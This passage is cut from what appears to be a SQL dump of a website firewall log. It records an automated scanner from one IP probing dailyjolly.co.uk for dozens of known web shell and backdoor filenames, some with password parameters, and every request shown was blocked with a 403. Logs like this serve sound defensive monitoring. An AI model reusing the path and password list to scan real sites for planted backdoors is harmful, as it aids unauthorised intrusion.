"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mad.php\"}','UAulBzyxkc8ILsvmjJhGe9rp',0,1674369968.4652,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/marijuana.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/marijuana.php\"}','DGiJr5MNWLQaXhom80SIpbT3',0,1674369968.7860,166,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mass.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mass.php\"}','cVojxgaBGkM5t8iUvrd2SO7P',0,1674369969.3300,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/media-admin.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/media-admin.php\"}','2TrjH1w354bFhfJsyvKtVGlX',0,1674369969.6561,164,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mini.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mini.php\"}','8uEo69VOWnSewaIfqDjsM3rK',0,1674369969.9825,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/mininew.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/mininew.php\"}','EPszpkuvZfX3BRrNOGWMHybt',0,1674369970.3017,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/new-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/new-index.php\"}','nYqrOBZWVm3liv4uDPkIdMhp',0,1674369970.6482,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/old-index.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/old-index.php\"}','NJDAzbrVd7TSs2pYcej19Ek0',0,1674369970.9692,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/payout.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/payout.php\"}','HpM92IhP7JvgC1Bnmut6WFO4',0,1674369971.3117,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/pi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/pi.php\"}','dXAbEl6DHZ5JGnotS9ukRVzN',0,1674369971.6286,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/priv8.php\"}','efCnzUq5Z42uILXAik1BJRvV',0,1674369971.9484,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/R00T.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/R00T.php\"}','4tl0C2zbKUqLmiEuhnAHPfYk',0,1674369972.2935,168,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/radio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/radio.php\"}','Zd1yzliovH8Fra4SOcLItw96',0,1674369972.6228,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/reminder.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/reminder.php\"}','yLminFYElS9OQIKrRqNx24cf',0,1674369972.9319,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/screenshot_1.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/screenshot_1.php\"}','Rv8o6DNljbSyu5zh7LXp2amn',0,1674369973.2621,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/shell.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/shell.php\"}','2XLimcWQP3Vlh67N0z8ojZHC',0,1674369973.5834,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/small.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/small.php\"}','jSGheXI6i3E7UwoAxbNdzFla',0,1674369973.9355,190,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/srx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/srx.php\"}','QuXUth1jJ0z3rRi6EIe7Ksld',0,1674369974.2850,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/up-kon.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/up-kon.php\"}','f0jAcW1UxpFQso7MuklJERCV',0,1674369974.6056,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/up.php\"}','G6n5wcZiQADP9Xf43IFLRUhk',0,1674369974.9529,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload.php\"}','Szx9EG2yrUDfh6Mg4pPIAFcn',0,1674369975.2851,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/upload.php?mr=exe3','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/upload.php?mr=exe3\"}','Fd9oKvOtWNG53jY6rquIcelL',0,1674369975.5973,155,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/uploads/up.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/uploads\\/up.php\"}','nyw1fc2lOWKCN93i4tbDJUg7',0,1674369975.9027,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/uploads/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/uploads\\/xleet.php\"}','OqAkTofgibdBG6yV2E57tLwQ',0,1674369976.2136,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/ups.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/ups.php\"}','BnmdhLpfoFv4kCa7KObyH95e',0,1674369976.5463,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/utchiha.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/utchiha.php\"}','iUKsIvwbH6uaWZV2OYqn9kGe',0,1674369976.8646,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wikindex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wikindex.php\"}','ASDJrsK5yR2Wvu8m7h4qj90e',0,1674369977.1812,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/fx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/fx.php\"}','j2oqpwkFTf8z54Qeih7Zat0Y',0,1674369977.5154,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/images/module.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/images\\/module.php\"}','Lm2ZVPFiyCeY7GQsRdao5xN4',0,1674369977.8326,203,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/maint/ms-db.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/maint\\/ms-db.php\"}','kaiXU2NL0BAf93bmOtGQn4qM',0,1674369978.3442,200,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/maint/sidwso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/maint\\/sidwso.php\"}','VJ1Ns6Ti2kWd4KamzHvXPbwu',0,1674369978.7054,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/priv8.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/priv8.php\"}','60ywfKE9vXZPrV5LHDMAhFNn',0,1674369979.0422,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/rss.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/rss.php\"}','JEhset19TcFBl8NjbowviX2C',0,1674369979.3592,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-admin/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-admin\\/xleet.php\"}','y5iE9FWxjSsKBz1hJmDoMlQN',0,1674369979.9623,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-blog.php\"}','3RqziZ9OT8fatUQHwoYlAbEp',0,1674369980.3191,177,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/wp-activate.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/\\/wp-activate.php\"}','1HGEymFdIaNR8YbeUpOVw3BD',0,1674369980.6554,174,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/fw.php\"}','PqIdH5XKOlDR3FCS1m4xzi0B',0,1674369980.9899,197,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/masterx/wpx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/\\/masterx\\/wpx.php\"}','FerOEkz5WljQKJhGBaNYqfPM',0,1674369981.3835,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/easybusy/wp-blog.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/easybusy\\/wp-blog.php\"}','GpT7eJQh9w1Pm6kEZMKv4DA5',0,1674369981.7252,178,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/plugins/fighter/fk.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/plugins\\/fighter\\/fk.php\"}','3JG7U9kY1OXLVRE5ympsodhH',0,1674369982.0783,191,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/themes/wp-pridmag/init.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/themes\\/wp-pridmag\\/init.php\"}','rjlNAJZKoUY3ustRB2aeG5PF',0,1674369982.4461,183,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/upgrade/utchiha505.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/upgrade\\/utchiha505.php\"}','mksQfv1UXTruwDWS8jtgpK0Z',0,1674369982.8000,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/upload.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/upload.php\"}','saB8KWgTnrLUXfbHeYPd17l2',0,1674369983.1500,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/wp-content/uploads/code-execution.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/\\/wp-content\\/uploads\\/code-execution.php\"}','ecxM74Di0OYVoQ5gPRCLsFIq',0,1674369983.4832,172,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/404.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/404.php\"}','TcS53AlY4M9QFtHbJyrjZxaP',0,1674369983.8146,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/4O4.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/4O4.php\"}','Qe3wlom0xnkUIAbiYWfEc6yC',0,1674369984.1663,161,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/elementor/about.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/elementor\\/about.php\"}','m1HPfcQVghpYlwe6SqbEtOvi',0,1674369984.4845,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/external_feed.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/external_feed.php\"}','W9Fhuz78CpByDKV6gUPOjlMe',0,1674369984.7985,169,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-content/uploads/indoex.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-content\\/uploads\\/indoex.php\"}','ibR5a7ujSPDXkrmIesHnW8f0',0,1674369985.1264,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-easy.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-easy.php\"}','ZChfYJmnvWQz1lKU6uiw8qbL',0,1674369985.4736,175,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-god.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-god.php\"}','AU4nPHFjqKhOJb2X7agpzY9i',0,1674369985.7987,173,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/24.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/24.php\"}','dOvWX0ml3ZefHNJouDkwsjIy',0,1674369986.1223,160,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/indeh.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/indeh.php\"}','kj4hTn1dgOCupbZYrERVQ38F',0,1674369986.4323,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/ms-pie.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/ms-pie.php\"}','U12ewlEZvhVSqpJBAdHrI8XD',0,1674369986.7460,182,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/radio.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/radio.php\"}','WYhpUqjmIM7iLaAnGOxKtD0B',0,1674369987.0796,214,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/theme-templates-private.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/theme-templates-private.php\"}','3qa0EuYF2TzjGNJAyX5lC6fM',0,1674369987.4530,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/uplaod.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/uplaod.php\"}','mb5fqSLYdp8FDtX2yxMNiHEj',0,1674369987.7683,186,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/v22.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/v22.php\"}','6ORfFoS72pu8VjAZwdzTte3W',0,1674369988.1050,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-2019.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-2019.php\"}','FeQcSzyKW4kH91XZg307xa68',0,1674369988.4207,162,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-includes/admin-bar.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-includes\\/admin-bar.php\"}','8tDxhgC2OelIXYGHuZ3kE7B9',0,1674369988.7333,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/wp-site.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/wp-site.php\"}','J0Vy1xPZ6dEsSjefwUTlbzQo',0,1674369989.0523,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/xmrlpc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/xmrlpc.php\"}','1lmVAghs97eBTXucQvJ2IwSG',0,1674369989.3786,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/\\/xx.php\"}','Xk3ZcdlSqMjfzovYpewxWACO',0,1674369989.6905,163,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/1index.php?pass=am*guAW8.ryDgz-TYF\"}','SBWA2zrbgplks3P9YXumcyjo',0,1674369990.0082,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/assets/pi.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/assets\\/pi.php\"}','04QdauG2msUITBrWoycz9Pik',0,1674369990.4915,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/block-supports/generated-classname-cron.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/block-supports\\/generated-classname-cron.php\"}','aq1ZhjkQsmvKxpyIuUOebtHG',0,1674369990.8488,212,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/css/ty.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/css\\/ty.php\"}','4S5kDyLJzBbHVhtY0CK7R3a1',0,1674369991.2205,357,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php?new','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/customize\\/class-wp-customize-nav-menu.php?new\"}','DE7oI9yN2i3daUjZqm6OXxts',0,1674369991.7595,199,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/js/a.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/js\\/a.php\"}','HrOM9kYUFENvz1xd03cAow7f',0,1674369992.1177,212,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/alfa.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/alfa.php\"}','inBOFsdVq2CKPhXTGgHklDj4',0,1674369992.6705,167,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-includes/pomo/css_.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-includes\\/pomo\\/css_.php\"}','Ifd1s5xzMFEhNYV9RZwmkrHj',0,1674369992.9885,181,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-info.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-info.php\"}','qjDi3P7tSbaCG5ukyBcnI12L',0,1674369993.3298,245,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp-x.php\"}','SdITRKyFtO3i9nmLUuJwcMX5',0,1674369993.7283,176,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp.php\"}','PEyr6znMmgUB7WkZ48G1aRcC',0,1674369994.0567,188,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp_logx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp_logx.php\"}','ZCXWrxt3zaMk87lvGLN1q65F',0,1674369994.3952,158,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp_wrong_datlib.php?pass=stusa','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wp_wrong_datlib.php?pass=stusa\"}','AwLbSpN25x06RKstTMXyi813',0,1674369994.7123,193,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wpx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wpx.php\"}','HmcwAL5RMvNJp0ybK9E6ZnXj',0,1674369995.0565,187,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wso.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wso.php\"}','nyUK6LPz4f5OZFsRW8v2obDu',0,1674369995.4019,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wxo.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/wxo.php\"}','wqBvCE47PoaGcfjrsOyHnpx3',0,1674369995.7280,157,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/x.php\"}','Lh6kASatKuU7bfYoCqwzNgMZ',0,1674369996.0356,159,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xl.php\"}','LphvVnG0QADfKj6tHUgCXWd5',0,1674369996.3539,170,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xleet.php\"}','sVoX0mfrp6NJtzGnPaWgDOjI',0,1674369996.6929,171,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xlt.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xlt.php\"}','jkid0aYUwX98e4mWqIAfPtrV',0,1674369997.0258,165,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xml.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xml.php\"}','8fvTOyCFburS7cEPXzqA6mlD',0,1674369997.3502,184,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xmlrqc.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xmlrqc.php\"}','k5Lsod1XpEFxTutchRGzO8iK',0,1674369997.6968,156,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xwxx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xwxx.php\"}','Ri17d4bwLtvzFGKxVY63s0I9',0,1674369998.0120,207,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/XxX.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/XxX.php\"}','9zTEBVMFPpwYl01voSnDL6Ig',0,1674369998.3868,185,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Go-http-client\\/1.1\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\\/xx.php\"}','uxvGinC1PN7hLr9HOpEtzAyW',0,1674369998.7230,180,'','GET',403,0,700,0,1,'',0),('167.172.248.229',2813130981,'','https://www.dailyjolly.co.uk/wp-2018.php','','{\"1\":\"Go